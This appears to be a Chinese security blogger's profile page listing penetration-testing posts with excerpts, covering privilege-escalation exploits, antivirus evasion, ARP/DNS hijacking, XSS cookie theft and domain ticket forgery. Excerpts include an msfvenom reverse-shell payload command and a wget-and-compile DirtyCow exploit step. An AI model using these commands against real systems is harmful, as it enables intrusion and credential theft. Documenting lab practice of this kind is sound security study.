自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(35)
  • 收藏
  • 关注

原创 解决git管理GitHub连接问题

git提交文档到GitHub老是出问题,记录下。

2024-01-24 15:05:37 899 2

原创 抓电脑微信小程序包

日常渗透过程中,有时候在web端没有突破,可以考虑从app或者小程序等入手。但是小程序的抓包中间还是有很多坑的,之前的抓包方法好像不太好用了,查阅了网上大佬文章,自己也是折腾了半天才配置好,这里记录一下。

2023-12-11 15:07:45 238

原创 最新burp抓取模拟器app包(2023.12.4)

记录一下碰到的app抓包问题,折腾了两个小时,太痛苦了。。。

2023-12-11 15:03:19 1284

原创 解决centos7不显示网卡问题

物理机可以上网,同时给centos7配置的NAT模式,发现不能上网使用ifconfig命令,发现没有网卡信息,只有一个回环地址。

2023-09-22 15:08:59 4240 2

原创 使用git管理gitee常用命令

2)当你关联了两个多个仓库、有多个分支时,git push可能会报错,因为它不知道要上传代码到哪里去;这两者的区别:git push是git push origin master的一种简写形式。而git push origin master指定仓库和分支,就不会报错。4、当远程仓库内容变动,而本地没有时候,需要先pull到本地。1)当只关联一个远程,只有一个分支时,这两个命令没什么区别;1、先把远程仓库克隆到本地。2、本地变动添加到远程仓库。D:\Git项目目录。3、删除远程仓库文件。

2022-12-08 17:16:45 186 1

原创 js逆向实战2

对于不同的情况需要特殊分析,特别是提取自定义函数时候,把所需要调用的函数全部附上去,确保调试正确

2022-11-06 14:00:08 372

原创 IP地址转换地址段

近期工作需要,写了一个地址转化的小脚本,方便找到对应IP归属地址段,对于运维人员有一定辅助作用中间有些地方可以简化,不过也懒得改了…如下:

2022-06-29 17:06:19 903

原创 ngrok内网穿透

在做渗透时候,有时候需要用到内网穿透,让外网可以正常访问我们的资源,比如配合kali做下端口转发,非常好用。下面来看看ngrok这款工具,重点是免费!官网地址:https://ngrok.com/进入官网后,注册账号并登录,另外可以使用GitHub账号进行登录登录后,如下所示,下载对应系统的安装包https://dashboard.ngrok.com/get-started/setup记住这个Your Authtoken,每个人有一个专属的认证token做下ngrok配置在内网服务器执行ngrok.

2022-06-13 09:38:00 2455

原创 redis未授权漏洞复现

0x01 redis 漏洞简介&危害Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致以下风险:1、任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redi

2022-05-31 11:30:18 1031

原创 使用gcc编译一个简单的c程序

使用Linux系统自带的gcc编译工具1、编写helloworld的c程序#include<stdio.h>void main(){ printf("Hello World!\n"); return;}2、使用gcc编译成可执行文件[root@localhost ~]# gcc test.c -o test3、执行[root@localhost ~]# ./testHello World!...

2022-05-15 09:59:05 1409

原创 docker一些常用命令

在漏洞复现时候经常会用到docker环境,这里记录下一些常用命令:注:有些直接用镜像id表示了1、查看正在运行的容器docker ps2、关闭正在运行的容器docker kill 8e67853a07813、docker 删除所有的 docker ps -a 记录(删除的是镜像运行的实例)docker rm `docker ps -a -q`4、列举所有镜像docker images5、删除某个镜像docker rmi + 镜像名或者那串字符(image id)docker rmi

2022-04-27 09:13:34 786

原创 js逆向实战

前言当我们在做渗透测试时候,有时候经常会遇到登录位置进行了加密,通过普通的md5解码等是没办法解密的,开发者为了保护传输数据不被窃取,通常会自定义一些加密算法进行加密传输,如下:访问系统http://ycsjyh.duobashuzi.com:8889/toLogin发现用户名和密码都进行了加密,通过普通的base64解码是无法解码的js逆向分析需要定位到加密函数,打断点Crtl+Shift+F定位到加密函数encrypt搜索CryptoJS,定位到aes.js文件(直接在本地执行encr

2022-04-22 15:56:47 2491

原创 CISP-PTE维持记录(2022-03-30)

0x00前言初考CIST-PTE是在2019年,今天做了下维持,对其中的一些题目做下记录。其实这些题目基本上都是在网上可以找到的,其中标注的答案部分有极个别可能有误,请慎重!这里说下题型分布,选择题40个,80分;实操题2个,20分。总分100,>=70即可拿证。下面开始吧0x01选择题1、()是最常用的公钥密码算法 (2分)A 量子密码B DSAC RSAD 椭圆曲线2、通过修改HTTP Headers 中的哪个键值可以伪造来源网址() (2分)A User-AgentB Accept

2022-03-30 23:42:32 7204 5

原创 一些设置代理的思考

前言平常在做渗透的过程中,经常会用到代理,比如用burp抓包或者挂代理翻墙等。一直有个疑问,就是能不能,一边挂着代理是出口IP为代理IP,然后再在浏览器上挂一个burp的代理,这样在做渗透时候,是不是对方日志里记录的就是我的代理国外IP,而非我的真实IP呢?说干就干,在腾讯云上开一个tomcat服务,然后去访问,看日志里记录的访问日志,到底是哪个IP,如下:访问tomcat站点,显示正常这里有以下几种情况,我分别做了记录:1、不挂代理不挂代理访问,显示是本地真实IP2、启用代理开启v2代

2022-03-18 23:46:06 6451

原创 CobaltStrike脚本

正所谓"工欲善其事必先利其器",这里记录下自己平常用的一些CobaltStrike脚本,用于内网渗透、提权、永恒之蓝漏洞利用等。至于cs的使用等细节网上教程大堆,这里不再赘述。这里说下我的cs是4.0版本的因为一些脚本对于不同版本的cs可能会存在不兼容的情况,下面是具体效果图特别是k8gege的这个Ladon插件,真的厉害CrossC2不是太好用,就不写了脚本地址如下:链接:https://pan.baidu.com/s/1ocli8qMRf4Zbc-_Pu_cTvw提取码:5q9p

2022-03-10 09:25:57 791 14

原创 Linux脏管道 (Dirty Pipe)(CVE-2022-0847) 漏洞复现

漏洞描述CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。影响范围5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102复现过程环境信息

2022-03-08 17:13:25 417

原创 shellcode免杀之命令行加载shellcode过杀软

记录一下之前复现过的go语言编译shellcode过杀软的过程

2022-02-27 11:04:04 451

原创 shellcode免杀之VirtualAlloc函数加载shellcode过杀软

go语言木马免杀

2022-02-27 11:01:55 1032 1

原创 内网渗透之 arp欺骗-dns劫持-网站钓鱼

环境信息攻击机kali 192.168.10.124靶机win7 192.168.10.229arp欺骗用到ettercap工具1、启动ettercap -G2、设置嗅探网卡,如eth0扫描存活主机将靶机192.168.10.229添加为目标1,网关192.168.10.1添加为目标2进行arp欺骗此时可以在靶机win7上看到kali的mac地址和网关mac地址一致,欺骗成功dns劫持1、编辑 Ettercap 的文件vim /etc/ettercap/etter.dn

2022-02-26 11:22:45 5307

原创 mysql写入木马getshell总结

1、select into outfile写入木马2、SQL语句利用日志写shell3、sqlmap写入一句话getshell

2022-02-25 18:14:21 5546 1

原创 xss平台打cookie登录后台(保姆级教程)

前言最新看了一篇hack学习呀【记一次帮助粉丝渗透黑入杀猪盘诈骗的实战】的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下phpstudy环境复现找一个xss平台,如 http://xsscom.com/随便新建一个项目111,复制下面的代码到存在xss的地方即可直接找个反射型xss试一下(这里在虚机登录)这里xss平台获取到用户登录情况用这个获取到的cookie登录一下后台(在物理机试下)这里说一下,为了方便可以下载一个修改cookie的插件,如google浏览器的EditT

2022-02-25 10:56:28 4237

原创 Centos安装msf

0x01安装ruby环境metasploit需要ruby环境,centos默认未安装ruby环境,这里安装下ruby2.6.5下载地址 https://cache.ruby-china.com/pub/ruby/,下载列表如下:在centos下载压缩包wget https://cache.ruby-china.com/pub/ruby/ruby-2.6.5.zip解压unzip ruby-2.6.5.zip[root@localhost ~]# cd /home/joyce/soft/ru

2022-02-23 16:27:02 1381

原创 烂土豆ms16-075提权

环境信息目标机:server2008 192.168.111.4攻击机:kali 192.168.111.3目标上线首先通过制作html后门使目标机上线可以发现当前目标机用户为administrator通过当前会话框执行shell systeminfo查看当前系统信息,打补丁情况把该信息粘贴到http://bugs.hacking8.com/tiquan/查看可以利用的漏洞在GitHub上查找对应cs里烂土豆的插件,加载到cs中https://github.com

2022-02-23 16:24:41 1186

原创 验证内网渗透添加默认路由

内网渗透中,如果存在访问不到其它内网主机,而肉鸡又存在双网卡或者多网卡情况,就要考虑在msf中添加静态路由,如下图:在攻击者A不能直接访问服务器C,但是在拿下内网主机B后,可以通过添加静态路由,借助主机B作为跳板,对服务器C做进一步的渗透可以通过msfvenom制作一个木马,是肉鸡上线,这里我已经做好了msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.3 lport=8888 -f exe >shell.exe

2022-02-23 16:23:14 1785

原创 dirtyCow脏牛内核提权

dirtyCow脏牛内核提权这里我靶机用的是centos7,版本信息为Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux下载pocwget https://github.com/FireFart/dirtycow/archive/master.zip解压unzip master.zip编译gcc -pthre

2022-02-23 16:19:36 2997

原创 域渗透-白银票据和黄金票据的利用

最近做了一些靶场域渗透的实验,记录下一些关于白银票据和黄金票据的问题。0x01 白银票据的利用1 环境信息域控DC192.168.183.130域内主机win7192.168.183.1292 使用场景在拿到一个普通的域成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的域用户有域管理员权限。3 利用过程说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程获取sid whoami /all伪造票据MS14-068.exe -u 用户名@域

2022-02-23 09:55:54 3862 2

原创 向日葵rce漏洞复现

漏洞描述向日葵远程控制软件是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。监测到其存在远程命令执行漏洞。攻击者可构造特殊请求执行任意系统命令,获取服务器权限。影响范围向日葵 11.x 、10.x漏洞复现exp下载https://github.com/Mr-xn/sunlogin_rce/releases/tag/new向日葵版本10.3.0.27372链接:https://pan.baidu.com/s/1QMOaytWbkoBd

2022-02-21 19:18:37 1300

原创 文件上传Upload-labs学习笔记

前言Upload-labs是一个帮你总结所有类型的上传漏洞的靶场,包括常见的文件上传漏洞,项目地址:https://github.com/c0ny1/upload-labs先看下GitHub上的总结:1、靶机包含漏洞类型分类3.2 如何判断上传漏洞类型?第一关查看源代码,调用的前端js限制上传文件类型先将php文件命名为.jpg文件,然后上传,抓包修改文件后缀名为.php文件,forword即可。鼠标右键查看图片源码,找到php文件路径,木马连接第二关$is_upload = f

2022-02-12 00:43:51 1120

原创 三层网络靶场搭建&MSF内网渗透

三层网络靶场搭建&MSF内网渗透在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。网络拓扑环境搭建首先在虚拟机中新建3块网卡,选择仅主机模式将kali设为第一层网络vmnet1将第一层靶机设为双网卡vmnet1和vmnet2将第二层靶机设置为双网卡:vmnet2和vmnet3:

2022-02-09 10:46:44 2512

原创 vulnstack4靶场笔记

0x01 实验环境目标端ubuntuIP1: 192.168.157.128IP2: 192.168.183.128ubuntu:ubuntuwin7IP: 192.168.183.129douser:Dotest123DCIP: 192.168.183.130administrator:Test2008攻击端windows7 192.168.157.129kali 192.168.157.1300x01 渗透测试首先需要进入ubuntu开启服务,

2022-02-05 10:23:55 2141

原创 vulnstack-Web安全入门进阶实战靶场配置

Web安全入门进阶实战课程靶场为我们提供了很多web攻击靶场,免去了自己搭建过程中遇到的各种问题。但是在实际搭建过程中,发现配置上还有有点小问题,记录一下。因为默认配置是127.0.0.1,也就是说只能在本地访问,其它主机想去访问则访问不到。有时候需要用到集成工具如果kali等其它辅助渗透的时候会不太方便,这里记录下修改配置记录。

2022-02-02 09:27:02 1699 1

原创 vulnstack5靶场笔记

红日靶场5

2022-02-01 18:38:08 2444 2

原创 CVE-2021-4034漏洞复现

Linux Polkit 权限提升漏洞CVE-2021-4034复现

2022-01-27 09:49:40 2152 2

原创 vulnstack2靶机笔记

0x01-前言本次实验环境为红日安全团队出品的一个实战环境。其主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。登录密码统一为:1qaz@WSX靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail

2022-01-26 01:29:20 1858

原创 vulnstack1靶机笔记

0x01环境信息环境下载地址百度网盘: https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset密码: 【红日安全】您的下载密码为:n1u2虚机统计密码hongrisec@2019这里我为了方便修改为admin.123网络配置如图所示0x02 渗透测试1、信息收集打开win7靶机phpStudy访问http://192.168.52.143/同时底部存在MySQL数据库连接检测: 输入默认账号密码:

2022-01-21 23:40:40 1758

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除